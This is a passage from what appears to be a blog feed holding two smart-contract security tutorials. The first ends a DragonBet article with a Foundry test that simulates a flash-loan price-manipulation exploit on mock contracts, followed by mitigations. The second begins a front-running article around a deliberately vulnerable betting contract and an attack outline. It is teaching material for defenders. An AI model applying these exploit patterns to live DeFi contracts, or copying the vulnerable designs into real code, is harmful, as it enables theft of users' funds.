    uint256 public reserveB;

    function setReserves(uint256 _reserveA, uint256 _reserveB) external {
        reserveA = _reserveA; // Set TokenA reserves
        reserveB = _reserveB; // Set TokenB reserves
    }

    function getReserves() external view returns (uint112, uint112, uint32) {
        // Return the reserves and a mock timestamp
        return (uint112(reserveA), uint112(reserveB), uint32(block.timestamp));
    }
}

contract DragonBetTest is Test {
    DragonBet public dragonBet;
    MockToken public tokenA;
    MockToken public tokenB;
    MockAMM public amm;

    address attacker = address(0x123);
    address bettor1 = address(0x456);
    address bettor2 = address(0x789);

    function setUp() public {
        // Deploy tokens
        tokenA = new MockToken(&quot;TokenA&quot;, &quot;TKA&quot;); // Token used in the AMM
        tokenB = new MockToken(&quot;TokenB&quot;, &quot;TKB&quot;); // Token used for betting

        // Deploy mock AMM
        amm = new MockAMM();

        // Deploy DragonBet contract
        dragonBet = new DragonBet(
            address(tokenA),
            address(tokenB),
            address(amm)
        );

        // Mint and distribute tokens for participants
        tokenB.mint(attacker, 100 ether); // Attacker starts with 100 TokenB
        tokenB.mint(bettor1, 100 ether); // Bettor 1 starts with 100 TokenB
        tokenB.mint(bettor2, 100 ether); // Bettor 2 starts with 100 TokenB

        // Pre-fund the contract with enough TokenB for rewards
        tokenB.mint(address(dragonBet), 10_000 ether); // Contract holds sufficient TokenB

        // Mint TokenA to the AMM for initial reserves
        tokenA.mint(address(amm), 3_000 ether); // Initial TokenA reserves in AMM
        tokenB.mint(address(amm), 3_000 ether); // Initial TokenB reserves in AMM

        // Approve DragonBet contract to spend TokenB for bets
        vm.startPrank(attacker);
        tokenB.approve(address(dragonBet), type(uint256).max); // Attacker approves the contract
        vm.stopPrank();

        vm.startPrank(bettor1);
        tokenB.approve(address(dragonBet), type(uint256).max); // Bettor 1 approves the contract
        vm.stopPrank();

        vm.startPrank(bettor2);
        tokenB.approve(address(dragonBet), type(uint256).max); // Bettor 2 approves the contract
        vm.stopPrank();

        // Set initial AMM reserves for the price oracle
        amm.setReserves(3_000 ether, 3_000 ether); // Initial price: 1 TokenB = 1 TokenA
    }

    function toEth(uint256 value) internal pure returns (string memory) {
        uint256 ethValue = value / 1e18; // Get the integer part of the value
        uint256 fractional = (value % 1e18) / 1e15; // Get the first three decimal places
        return
            string(
                abi.encodePacked(
                    uint2str(ethValue),
                    &quot;.&quot;,
                    uint2str(fractional),
                    &quot; ETH&quot;
                )
            );
    }

    function uint2str(uint256 _i) internal pure returns (string memory) {
        if (_i == 0) {
            return &quot;0&quot;;
        }
        uint256 j = _i;
        uint256 len;
        while (j != 0) {
            len++;
            j /= 10;
        }
        bytes memory bstr = new bytes(len);
        uint256 k = len;
        while (_i != 0) {
            k = k - 1;
            uint8 temp = (48 + uint8(_i - (_i / 10) * 10));
            bytes1 b1 = bytes1(temp);
            bstr[k] = b1;
            _i /= 10;
        }
        return string(bstr);
    }

    function testFlashLoanAttack() public {
        // Step 1: Legitimate initial bets
        vm.startPrank(bettor1);
        dragonBet.placeBet(1, 5 ether); // Bettor 1 bets on dragon 1
        vm.stopPrank();

        vm.startPrank(bettor2);
        dragonBet.placeBet(1, 1 ether); // Bettor 2 bets on dragon 1
        vm.stopPrank();

        // Step 2: Simulate a flash loan
        vm.startPrank(attacker);

        console.log(&quot;=== Before Flash Loan ===&quot;);
        console.log(&quot;Attacker balance: &quot;, toEth(tokenB.balanceOf(attacker)));

        // Simulate a flash loan by minting TokenB to the attacker
        uint256 flashLoanAmount = 1_000 ether; 
        tokenB.mint(attacker, flashLoanAmount);

        console.log(
            &quot;Attacker balance after flash loan: &quot;,
            toEth(tokenB.balanceOf(attacker))
        );

        // Price manipulation: increase TokenB reserves and decrease TokenA reserves
        uint256 addedTokenB = 1_000 ether;
        uint256 removedTokenA = (amm.reserveA() * addedTokenB) / amm.reserveB();

        amm.setReserves(
            amm.reserveA() - removedTokenA,
            amm.reserveB() + addedTokenB
        );

        uint256 manipulatedPrice = dragonBet.getPrice();
        console.log(
            &quot;Manipulated price (winningPrice):&quot;,
            toEth(manipulatedPrice)
        );

        // Step 3: Attacker places a bet using the manipulated price
        dragonBet.placeBet(2, 1 ether);

        console.log(&quot;=== After price manipulation and bet ===&quot;);
        uint256 totalBetsGlobal = dragonBet.totalBets();
        console.log(&quot;Total bets globally (totalBets):&quot;, toEth(totalBetsGlobal));

        // Step 4: Resolve the bets
        dragonBet.resolveBet(2);

        // Step 5: Repay the flash loan
        tokenB.transfer(address(this), flashLoanAmount);
        console.log(
            &quot;Attacker balance after loan repayment: &quot;,
            toEth(tokenB.balanceOf(attacker))
        );

        vm.stopPrank();

        // Step 6: Final balance checks
        uint256 attackerBalanceAfter = tokenB.balanceOf(attacker);
        uint256 bettor1BalanceAfter = tokenB.balanceOf(bettor1);
        uint256 bettor2BalanceAfter = tokenB.balanceOf(bettor2);

        console.log(&quot;=== Final Balances ===&quot;);
        console.log(&quot;Attacker balance after: &quot;, toEth(attackerBalanceAfter));
        console.log(&quot;Bettor 1 balance after: &quot;, toEth(bettor1BalanceAfter));
        console.log(&quot;Bettor 2 balance after: &quot;, toEth(bettor2BalanceAfter));

        // Validate that the attacker profited
        assert(attackerBalanceAfter &gt; 100 ether); // Attacker made a profit
        assert(bettor1BalanceAfter &lt; 100 ether); // Bettor 1 lost
        assert(bettor2BalanceAfter &lt; 100 ether); // Bettor 2 lost
    }
}

```
&lt;/details&gt;


## The Exploitation Strategy

Let’s break down the strategy we’ll implement in our test case.

1.  **Set the Stage with Normal Bets:** First, other players place their bets, creating a pool of funds in the contract. This makes everything seem normal and gives the attacker a baseline to work with.
2.  **Mess with the AMM:** The attacker temporarily alters the token reserves in the AMM, which acts as the contract’s price oracle. This shifts the price in their favor, making it look like their bet is worth much more than it actually is.
3.  **Place a Well-Timed Bet:** Once the price is manipulated, the attacker places a small bet on the dragon they know will win. With the price skewed, even a tiny bet can lead to a massive payout.
4.  **Cash Out Big:** Finally, the attacker resolves the bets, triggering the contract’s reward system. Thanks to the manipulated price, they claim a disproportionately large reward, repay any borrowed tokens (if using a flash loan), and walk away with a hefty profit.

```mermaid
sequenceDiagram
    participant Attacker as Attacker
    participant FlashLoan as Flash Loan Provider
    participant AMM as AMM/Oracle
    participant DragonBet as DragonBet Contract

    %% Step 1: Flash Loan Acquisition
    Attacker -&gt;&gt; FlashLoan: Requests flash loan of 1000 TokenB
    FlashLoan --&gt;&gt; Attacker: Provides 1000 TokenB

    %% Step 2: Price Manipulation in AMM
    Attacker -&gt;&gt; AMM: Increase reserve1 (TokenB) by 1000 TokenB
    Attacker -&gt;&gt; AMM: Decrease reserve0 (TokenA) to manipulate price
    Note over Attacker, AMM: AMM price becomes skewed (TokenB expensive)

    %% Step 3: Manipulated Price Used in DragonBet
    AMM --&gt;&gt; DragonBet: Reports manipulated price (winningPrice high)
    Attacker -&gt;&gt; DragonBet: Place minimum bet on winning dragon
    Note over Attacker, DragonBet: Bet placed with skewed price advantage

    %% Step 4: Reward Calculation &amp; Payout
    DragonBet -&gt;&gt; DragonBet: Calculate rewards using inflated winningPrice
    DragonBet --&gt;&gt; Attacker: Transfer inflated reward

    %% Step 5: Repay Flash Loan
    Attacker -&gt;&gt; FlashLoan: Repays 1000 TokenB loan

    %% Step 6: Profit Retention
    Attacker --&gt;&gt; Attacker: Keeps net profit
    Note over DragonBet: Unfair rewards due to manipulated price


```

### **Setup: Initializing the Test Environment**

Before running the test, the script sets up the environment with tokens, a mock AMM, and the `DragonBet` contract. Tokens are minted and distributed to participants, and the AMM is initialized with equal reserves of `TokenA` and `TokenB` to create a balanced price.

```solidity
function setUp() public {
    tokenA = new MockToken(&quot;TokenA&quot;, &quot;TKA&quot;);
    tokenB = new MockToken(&quot;TokenB&quot;, &quot;TKB&quot;);
    amm = new MockAMM();

    dragonBet = new DragonBet(
        address(tokenA),
        address(tokenB),
        address(amm)
    );

    tokenB.mint(attacker, 100 ether);
    tokenB.mint(bettor1, 100 ether);
    tokenB.mint(bettor2, 100 ether);

    tokenB.mint(address(dragonBet), 10_000 ether);

    tokenA.mint(address(amm), 3_000 ether);
    tokenB.mint(address(amm), 3_000 ether);

    vm.startPrank(attacker);
    tokenB.approve(address(dragonBet), type(uint256).max);
    vm.stopPrank();

    vm.startPrank(bettor1);
    tokenB.approve(address(dragonBet), type(uint256).max);
    vm.stopPrank();

    vm.startPrank(bettor2);
    tokenB.approve(address(dragonBet), type(uint256).max);
    vm.stopPrank();

    amm.setReserves(3_000 ether, 3_000 ether); // Initial price: 1 TokenB = 1 TokenA
}

```

This setup ensures that:

1.  The AMM has an initial 1:1 price ratio between `TokenA` and `TokenB`, based on reserves of 3,000 each.
2.  The `DragonBet` contract is pre-funded with enough `TokenB` to pay out rewards.
3.  All participants approve the contract to handle their tokens for betting.

### **Legitimate Bets**

Two bettors place legitimate bets on dragon 1 to create a baseline for the betting pool. Bettor 1 wagers 5 `TokenB`, and Bettor 2 wagers 1 `TokenB`.

```solidity
vm.startPrank(bettor1);
dragonBet.placeBet(1, 5 ether);
vm.stopPrank();

vm.startPrank(bettor2);
dragonBet.placeBet(1, 1 ether);
vm.stopPrank();

```

The `placeBet` function verifies the amount is greater than zero and transfers the specified `TokenB` from the bettor to the contract. After these operations, the total bets in the contract amount to 6 `TokenB`, entirely placed on dragon 1.

The internal state after this step:

-   Total bets: `6 TokenB`.
-   Bet distribution: `6 TokenB` on dragon 1, `0 TokenB` on dragon 2.

### **Flash Loan**

The attacker uses a flash loan to temporarily borrow 1,000 `TokenB`. This loan will be repaid later, but in the meantime, it provides liquidity for manipulating the AMM reserves.

```solidity
uint256 flashLoanAmount = 1_000 ether;
tokenB.mint(attacker, flashLoanAmount);

```

Here, the `mint` function of `MockToken` simulates a flash loan by directly increasing the attacker&apos;s balance. Flash loans in real systems are typically provided by DeFi protocols like Aave or dYdX, allowing large sums to be borrowed without collateral if repaid in the same transaction.

**Attacker&apos;s balance after flash loan:** `1,100 TokenB`.

### **Price Manipulation**

The attacker alters the AMM reserves, increasing `TokenB` and decreasing `TokenA`. This skews the price of `TokenA` upward.

```solidity
uint256 addedTokenB = 1_000 ether;
uint256 removedTokenA = (amm.reserveA() * addedTokenB) / amm.reserveB();

amm.setReserves(
    amm.reserveA() - removedTokenA,
    amm.reserveB() + addedTokenB
);

```

The attacker deposits 1,000 `TokenB` into the AMM and removes an equivalent amount of `TokenA` to maintain the constant product formula ($ x\*y = k $). This causes the price of `TokenA` to double, as its relative scarcity increases.

**Updated AMM reserves:**

-   `reserveA (TokenA): 2,000`.
-   `reserveB (TokenB): 4,000`.  
    

$$1$

### **Placing the Manipulated Bet**

The attacker places a 1 `TokenB` bet on dragon 2, strategically positioning themselves to exploit the manipulated price during reward calculation.

```solidity
dragonBet.placeBet(2, 1 ether);

```

This bet adds 1 `TokenB` to dragon 2, increasing the total bets in the contract to 7 `TokenB`. The attacker is now the sole bettor on dragon 2, ensuring they will receive all rewards if dragon 2 wins.

**Internal state after this step:**

-   Total bets: `7 TokenB`.
-   Bet distribution: `6 TokenB` on dragon 1, `1 TokenB` on dragon 2.

### **Resolving the Bets**

The bets are resolved, and dragon 2 is declared the winner. The attacker’s reward is calculated using the manipulated price.

```solidity
dragonBet.resolveBet(2);

```

The reward for the attacker is calculated using the formula in the contract:

$$\text{Reward} = \frac{\text{attackerBet} \cdot \text{totalBets} \cdot \text{winningPrice}}{\text{totalWinningBets}}$$

Where:

$$\text{attackerBet} = 1 , \text{TokenB} \\ \text{totalBets} = 7 , \text{TokenB} , \text{(sum of all bets)}. \\ \text{winningPrice} = 2 , \text{TokenB per TokenA}. \\ \text{totalWinningBets} = 1 , \text{TokenB} , \text{(only the attacker bet on dragon 2)}.$$

Substituting:  

$$\text{Reward} = \frac{1 \cdot 7 \cdot 2}{1} = 14 , \text{TokenB}.$$

The attacker receives **14 TokenB** as their reward, draining this amount from the contract&apos;s balance. Had the price not been manipulated, the attacker would have only received **7 TokenB** as their reward, proportional to their bet size relative to the total pool and based on the unaltered price of **1 TokenB per TokenA**.

### **Repaying the Flash Loan**

After receiving the reward, the attacker repays the flash loan, ensuring no collateral was required for the attack.

```solidity
tokenB.transfer(address(this), flashLoanAmount);

```

The loan of 1,000 `TokenB` is repaid, leaving the attacker with the remaining tokens as pure profit.

**Attacker’s balance after repayment:** `113 TokenB` (initial 100 + reward 14 - loan repayment 1,000).

### **Final Balances**

The script checks the final balances to confirm the attacker’s profit and validate the attack&apos;s success.

```solidity
uint256 attackerBalanceAfter = tokenB.balanceOf(attacker);
uint256 bettor1BalanceAfter = tokenB.balanceOf(bettor1);
uint256 bettor2BalanceAfter = tokenB.balanceOf(bettor2);

console.log(&quot;Attacker balance after: &quot;, toEth(attackerBalanceAfter));
console.log(&quot;Bettor 1 balance after: &quot;, toEth(bettor1BalanceAfter));
console.log(&quot;Bettor 2 balance after: &quot;, toEth(bettor2BalanceAfter));

```

![](/content/images/2024/12/image-6.png)

Final Results

# Top 3 Strategies to Mitigate Flash Loan Vulnerabilities

Among the various solutions to prevent flash loan exploits, the following three strategies stand out as the most critical for ensuring robust smart contract security:

#### **Time-Weighted Average Price (TWAP)**

Instead of relying on a spot price fetched directly from an AMM, use a **Time-Weighted Average Price (TWAP)**. This approach calculates an average price over a specified time window, significantly reducing the impact of short-term price manipulation.

```solidity
function getPrice() public view returns (uint256) {
    // Use TWAP from the price oracle
    return priceOracle.consult(address(tokenA), 1e18);
}

```

#### **Cap Rewards Based on Logical Limits**

Set a maximum reward cap based on logical limits, such as a multiplier of the total bets or a hard-coded maximum payout value. This ensures that even if the price is manipulated, the attacker cannot drain the entire contract balance.

```solidity
function resolveBet(uint256 winningDragonId) external {
    uint256 winningPrice = getPrice();
    Bet[] memory winningBets = bets[winningDragonId];
    uint256 totalWinningBets = 0;

    for (uint256 i = 0; i &lt; winningBets.length; i++) {
        totalWinningBets += winningBets[i].amount;
    }

    require(totalWinningBets &gt; 0, &quot;No bets placed on the winning dragon&quot;);

    uint256 rewardCap = totalBets * 2; // Limit rewards to 2x the total pool

    for (uint256 i = 0; i &lt; winningBets.length; i++) {
        uint256 reward = (winningBets[i].amount * totalBets * winningPrice) / totalWinningBets / 1e18;

        // Apply the cap
        if (reward &gt; rewardCap) {
            reward = rewardCap;
        }

        uint256 contractBalance = tokenB.balanceOf(address(this));
        if (reward &gt; contractBalance) {
            reward = contractBalance;
        }

        require(tokenB.transfer(winningBets[i].user, reward), &quot;Transfer failed&quot;);
    }

    totalBets = 0;
    delete bets[winningDragonId];
}

```

#### **Commit-Reveal Mechanism**

A commit-reveal mechanism for placing bets can prevent attackers from reacting to price manipulations during the same transaction. Bettors first submit a hashed commitment of their bet, which is revealed in a later phase. This adds a layer of unpredictability to the system, reducing the attacker’s ability to time their exploits effectively.

```solidity
mapping(address =&gt; bytes32) public committedBets;

function commitBet(bytes32 hashedBet) external {
    committedBets[msg.sender] = hashedBet;
}

function revealBet(uint256 amount, uint256 dragonId, bytes32 salt) external {
    require(
        keccak256(abi.encodePacked(amount, dragonId, salt)) == committedBets[msg.sender],
        &quot;Invalid reveal&quot;
    );
    delete committedBets[msg.sender]; // Clear the commitment
    placeBet(dragonId, amount); // Proceed with the revealed bet
}


```

# Conclusions: Key Takeaways

Flash loan vulnerabilities demonstrate the inherent challenges of balancing transparency and security in decentralized systems. Through the **DragonBet** case study, we’ve seen how external price manipulation can disrupt the fairness of a protocol. Here are the key takeaways:

1.  **External Dependencies Are Risky**: Relying on external data sources, such as AMMs, without validation makes protocols susceptible to manipulation. Strengthening oracles and adding safeguards is crucial.
2.  **Testing Is Essential**: Comprehensive testing, including simulating attacks, can reveal weaknesses that might otherwise go unnoticed in production environments.
3.  **Mitigation Strategies Exist**: Techniques like time-weighted average prices, commit-reveal schemes, or restricting reward distributions based on timeframes can significantly reduce the impact of exploits.

By understanding these vulnerabilities and implementing robust mitigation strategies, developers can create DeFi systems that are not only innovative but also secure and resilient.

### References

1.  Foundry - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
2.  Solidity - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
3.  OpenZeppelin - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
4.  Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
5.  Testing Ethereum Smart Contracts - Best Practices with Foundry. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/tutorials/testing](https://book.getfoundry.sh/tutorials/testing)
6.  Decentralized Exchanges and AMMs - Key Mechanics and Risks. &quot;Uniswap Documentation.&quot; Available at: https://docs.uniswap.org/
7.  Gas Price Mechanics - Understanding Gas and Transaction Fees in Ethereum. &quot;Ethereum Documentation.&quot; Available at: [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
8.  Price Oracles and Their Role in DeFi. &quot;Chainlink Documentation.&quot; Available at: https://docs.chain.link/
9.  Flash Loan Attacks in DeFi - Case Studies and Mitigations. &quot;CertiK Blog.&quot; Available at: [https://www.certik.com/](https://www.certik.com/)</content:encoded><author>Ruben Santos</author></item><item><title>Simulating Front-Running Attacks in Ethereum: A Deep Dive with Foundry and Anvil</title><link>https://www.kayssel.com/post/web3-5</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-5</guid><description>This article explores front-running vulnerabilities in Ethereum smart contracts using the BiomechanicalRace case study. It simulates attacks with Anvil, Cast, and a custom validator, analyzing gas price impacts and proposing secure design solutions like commit-reveal schemes to prevent exploits.</description><pubDate>Sun, 01 Dec 2024 12:13:27 GMT</pubDate><content:encoded># **What is a Front-Running Vulnerability?**

In the world of blockchain, where transparency is both a strength and a potential weakness, a front-running vulnerability is a type of exploit that takes advantage of the visibility of transactions in the mempool (the waiting area where transactions are queued before being added to the blockchain). Essentially, it&apos;s a form of transaction hijacking where an attacker anticipates another user&apos;s transaction and inserts their own with a higher gas fee to ensure it is processed first.

Let’s break it down:

When you submit a transaction to a blockchain, it doesn&apos;t get added to a block immediately. Instead, it goes into the mempool, where miners (or validators) prioritize which transactions to process based on gas fees. A front-runner monitors this mempool, identifies valuable transactions, and submits a similar transaction with a higher gas fee. The miner, incentivized to maximize profit, will typically include the front-runner’s transaction first, allowing the attacker to gain an advantage.

This vulnerability is particularly prevalent in decentralized finance (DeFi), token swaps, and NFT marketplaces, where timing and order of transactions can significantly impact outcomes. For example:

-   In token trades, an attacker can buy tokens before a large buy order and sell them at a profit once the price rises.
-   In betting systems, they can place larger bets just ahead of other participants to disproportionately benefit from the payout structure.

Front-running isn&apos;t a flaw in blockchain technology itself but rather a side effect of the transparent and open nature of decentralized systems. While blockchain&apos;s transparency ensures trustlessness and security, it also means that transaction details are visible to everyone, including attackers.

To understand this better, let’s dive into an example where we simulate a front-running attack on a smart contract.

# Vulnerable Smart Contract

In this chapter, we’re going to test a front-running vulnerability in a smart contract. Like in the previous chapter, we’ll use **Foundry** instead of Hardhat to run our tests. If you’re unfamiliar with Foundry or need help setting it up, refer back to the [earlier chapter for a detailed guide on configuration](https://www.kayssel.com/post/web3-4/). For now, let’s focus on understanding the contract we’ll be working with.

The smart contract, `BiomechanicalRace`, represents a simple betting system where users can place bets on racing creatures. After the race concludes, the bettors who backed the winning creature can claim rewards proportional to their contributions. Let’s break it down step by step, examining its functionality and structure through its code.

&lt;details&gt;
&lt;summary&gt;All code&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract BiomechanicalRace {
    struct Creature {
        string name;
        uint256 totalBets; // Total ETH bet on this creature
    }

    bool public raceFinished;
    uint256 public totalBets;
    uint256 public multiplier = 100; // Initial multiplier (100%)
    uint256 public multiplierStep = 10; // Each bet decreases the multiplier by 10%

    mapping(uint256 =&gt; Creature) public creatures; // Mapping of creatures
    mapping(address =&gt; mapping(uint256 =&gt; uint256)) public bets; // Bets by user and creature
    mapping(address =&gt; uint256) public rewards; // Rewards for each user after the race

    address[] public participants; // List of all participants
    mapping(address =&gt; bool) public hasPlacedBet; // To avoid duplicate entries in the participant list

    constructor() {
        // Initialize creatures for the race
        creatures[1] = Creature(&quot;CyberLynx&quot;, 0);
        creatures[2] = Creature(&quot;MechaEagle&quot;, 0);
    }

    /**
     * @dev Allows users to place a bet on a specific creature.
     * @param creatureId The ID of the creature to bet on.
     */
    function placeBet(uint256 creatureId) external payable {
        require(!raceFinished, &quot;Race has already ended&quot;);
        require(msg.value &gt; 0, &quot;Bet amount must be greater than zero&quot;);
        require(
            bytes(creatures[creatureId].name).length &gt; 0,
            &quot;Invalid creature ID&quot;
        );
        require(multiplier &gt; 0, &quot;Multiplier depleted&quot;);

        // Apply the multiplier to the bet
        uint256 adjustedBet = (msg.value * multiplier) / 100;

        // Update bet data
        creatures[creatureId].totalBets += adjustedBet;
        totalBets += adjustedBet;
        bets[msg.sender][creatureId] += adjustedBet;

        // Add the participant to the list if not already added
        if (!hasPlacedBet[msg.sender]) {
            participants.push(msg.sender);
            hasPlacedBet[msg.sender] = true;
        }

        // Reduce the multiplier for the next bet
        if (multiplier &gt; multiplierStep) {
            multiplier -= multiplierStep;
        } else {
            multiplier = 0; // Ensure multiplier does not go negative
        }
    }

    /**
     * @dev Ends the race and calculates rewards for the winning creature&apos;s bettors.
     * @param winnerId The ID of the winning creature.
     */
    function endRace(uint256 winnerId) external {
        require(!raceFinished, &quot;Race already ended&quot;);
        require(
            bytes(creatures[winnerId].name).length &gt; 0,
            &quot;Invalid winner ID&quot;
        );

        raceFinished = true;

        uint256 totalWinnerBets = creatures[winnerId].totalBets;

        // Assign rewards proportional to each user&apos;s winning bet
        for (uint256 i = 0; i &lt; participants.length; i++) {
            address user = participants[i];
            uint256 userBet = bets[user][winnerId];
            if (userBet &gt; 0) {
                rewards[user] =
                    (userBet * address(this).balance) /
                    totalWinnerBets;
            }
        }
    }

    /**
     * @dev Allows users to claim their winnings after the race has ended.
     */
    function claimWinnings() external {
        require(raceFinished, &quot;Race is not finished yet&quot;);
        uint256 winnings = rewards[msg.sender];
        require(winnings &gt; 0, &quot;No winnings to claim&quot;);

        rewards[msg.sender] = 0;
        payable(msg.sender).transfer(winnings);
    }

    /**
     * @dev Returns the list of participants who placed bets in the race.
     * @return An array of participant addresses.
     */
    function getParticipants() external view returns (address[] memory) {
        return participants;
    }
}

```
&lt;/details&gt;


#### **Data Structures**

The contract begins by defining its core data structure, a `Creature`. Each creature has a name and tracks the total ETH bet on it. Additionally, the contract maintains a flag to check if the race has concluded (`raceFinished`), tracks the total amount of ETH bet across all creatures, and introduces a unique `multiplier` mechanic to incentivize early betting.

Here’s the relevant part of the code:

```solidity
struct Creature {
    string name;
    uint256 totalBets; // Total ETH bet on this creature
}

bool public raceFinished;
uint256 public totalBets;
uint256 public multiplier = 100; // Initial multiplier (100%)
uint256 public multiplierStep = 10; // Each bet decreases the multiplier by 10%

```

The contract also uses mappings to store bets, calculate rewards, and keep track of participants. A dynamic array, `participants`, stores all bettors, ensuring no duplicate entries through the `hasPlacedBet` mapping.

```solidity
mapping(uint256 =&gt; Creature) public creatures; // Mapping of creatures
mapping(address =&gt; mapping(uint256 =&gt; uint256)) public bets; // Bets by user and creature
mapping(address =&gt; uint256) public rewards; // Rewards for each user after the race
address[] public participants; // List of all participants
mapping(address =&gt; bool) public hasPlacedBet; // To avoid duplicate entries in the participant list

```

#### **Placing a Bet**

The `placeBet` function allows users to bet on a specific creature. Before processing the bet, it performs several checks:

-   The race must still be active.
-   The amount bet must be greater than zero.
-   The specified creature ID must be valid.
-   The `multiplier` must still have value to apply adjustments to the bet.

Once these conditions are met, the bet is adjusted using the `multiplier`, rewarding early bettors with higher effective contributions. The adjusted bet is added to the chosen creature’s total bets, and the bettor’s details are updated. If the bettor is new, they’re added to the `participants` list.

Here’s how it’s implemented:

```solidity
function placeBet(uint256 creatureId) external payable {
    require(!raceFinished, &quot;Race has already ended&quot;);
    require(msg.value &gt; 0, &quot;Bet amount must be greater than zero&quot;);
    require(bytes(creatures[creatureId].name).length &gt; 0, &quot;Invalid creature ID&quot;);
    require(multiplier &gt; 0, &quot;Multiplier depleted&quot;);

    uint256 adjustedBet = (msg.value * multiplier) / 100;
    creatures[creatureId].totalBets += adjustedBet;
    totalBets += adjustedBet;
    bets[msg.sender][creatureId] += adjustedBet;

    if (!hasPlacedBet[msg.sender]) {
        participants.push(msg.sender);
        hasPlacedBet[msg.sender] = true;
    }

    if (multiplier &gt; multiplierStep) {
        multiplier -= multiplierStep;
    } else {
        multiplier = 0;
    }
}

```

This function not only tracks bets but also adjusts the `multiplier`, ensuring it decreases over time to encourage early participation.

#### **Ending the Race**

Once the race concludes, the `endRace` function is used to determine the winning creature and calculate rewards for its backers. The function verifies that the race has not already ended and that the winning creature ID is valid. It then calculates the total amount of ETH bet on the winning creature and iterates over all participants to assign rewards proportional to their contributions.

&lt;details&gt;
&lt;summary&gt;The code for this logic is as follows:&lt;/summary&gt;

```solidity
function endRace(uint256 winnerId) external {
    require(!raceFinished, &quot;Race already ended&quot;);
    require(bytes(creatures[winnerId].name).length &gt; 0, &quot;Invalid winner ID&quot;);

    raceFinished = true;

    uint256 totalWinnerBets = creatures[winnerId].totalBets;

    for (uint256 i = 0; i &lt; participants.length; i++) {
        address user = participants[i];
        uint256 userBet = bets[user][winnerId];
        if (userBet &gt; 0) {
            rewards[user] = (userBet * address(this).balance) / totalWinnerBets;
        }
    }
}

```
&lt;/details&gt;


This function finalizes the race, preventing further bets, and prepares the `rewards` mapping for users to claim their winnings.

#### **Claiming Winnings**

After the race is completed and rewards are calculated, users can claim their winnings using the `claimWinnings` function. The function ensures that:

-   The race has concluded.
-   The user has winnings to claim.

If these conditions are met, it transfers the calculated amount to the user and resets their reward balance.

```solidity
function claimWinnings() external {
    require(raceFinished, &quot;Race is not finished yet&quot;);
    uint256 winnings = rewards[msg.sender];
    require(winnings &gt; 0, &quot;No winnings to claim&quot;);

    rewards[msg.sender] = 0;
    payable(msg.sender).transfer(winnings);
}

```

This function ensures that only legitimate claims are processed and that rewards are paid out efficiently.

#### **Participants Management**

To facilitate the reward calculation process, the contract maintains a list of all participants through the `participants` array. The `getParticipants` function provides a way to retrieve this list, allowing anyone to view the bettors involved in the race.

```solidity
function getParticipants() external view returns (address[] memory) {
    return participants;
}

```

# **Exploiting the Front-Running Vulnerability**

Now that we’ve explored the `BiomechanicalRace` contract in detail, let’s delve into the strategy for exploiting its vulnerability. The contract&apos;s design, particularly its use of a diminishing multiplier to reward early bets, makes it susceptible to front-running attacks. In this section, we’ll outline the exploitation strategy and then walk through the test case that simulates this attack using Foundry.

## **The Exploitation Strategy**

The front-running attack leverages the transparency of the blockchain, specifically the way transactions are prioritized and processed based on gas fees. In this simulation, we’ll break down how the attack is executed step by step while showcasing the tools and scripts used to replicate it.

#### **Monitoring the Mempool**

In a real-world scenario, an attacker continuously monitors the mempool (the transaction queue) for incoming bets placed by other participants. The attacker’s goal is to identify these transactions, especially those with lower gas prices, which are less likely to be prioritized by validators.

In this simulation, we mimic the mempool monitoring process using our **custom validator**. The validator scans and prioritizes transactions based on their gas prices. This gives us a controlled environment to simulate the behavior of a front-runner while maintaining the integrity of our attack simulation.

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    &lt;strong&gt;Note&lt;/strong&gt;: While we won’t automate the mempool monitoring process for the attacker in this chapter, such a script would be very similar to the custom validator script. Instead of prioritizing transactions for mining, the attacker would analyze the mempool to detect specific patterns or targets (like Player1’s bet) and respond by crafting their own higher-priority transactions.
  &lt;/div&gt;
&lt;/div&gt;

#### **Placing a Front-Running Transaction**

Once the attacker detects Player1’s transaction in the mempool, they respond by crafting their own transaction with a higher gas fee. The higher gas fee ensures that validators process the attacker’s transaction first, granting them priority access to the contract’s diminishing multiplier.

In this simulation:

1.  **Player1’s Bet**: Player1 places a bet on a creature with a gas price of `70 gwei`.
2.  **Attacker’s Bet**: The attacker places a competing bet with a gas price of `80 gwei`.

By using our **custom validator**, we ensure that the attacker’s higher gas price gives them priority, and their transaction is mined before Player1’s.

#### **Benefiting from the Multiplier Advantage**

The **BiomechanicalRace** contract uses a diminishing multiplier system to incentivize early betting. The first bet processed receives the highest multiplier, and subsequent bets see progressively lower rewards.

-   **Attacker’s Transaction**: Mined first, benefiting from a higher multiplier, resulting in a better-adjusted bet.
-   **Player1’s Transaction**: Mined later, with a reduced multiplier, leading to less favorable terms.

The custom validator simulates this prioritization realistically, enabling us to observe the attacker’s advantage clearly.

#### **Claiming Rewards**

After the race concludes and the winning creature is declared:

1.  **The Player and Attacker Claim Winnings**: The rewards are distributed based on the adjusted bets and total pool of ETH.
2.  **Disproportionate Rewards**: Due to the front-running, the attacker claims a significantly larger share of the rewards compared to Player1.

## Simulating the Attack Using Anvil, Cast, and a Custom Validator

In the previous chapter, we explored how to analyze vulnerabilities using Foundry’s built-in testing mechanisms, leveraging its powerful framework to write and execute automated tests directly in Solidity. This time, we’ll take a slightly different approach to broaden our perspective and explore additional tools in the blockchain development ecosystem. Specifically, we’ll simulate a vulnerability using **Anvil** and **Cast**, alongside a custom-built validator, to replicate real-world scenarios and gain a deeper understanding of how these tools interact and function in practice.

### What is Anvil?

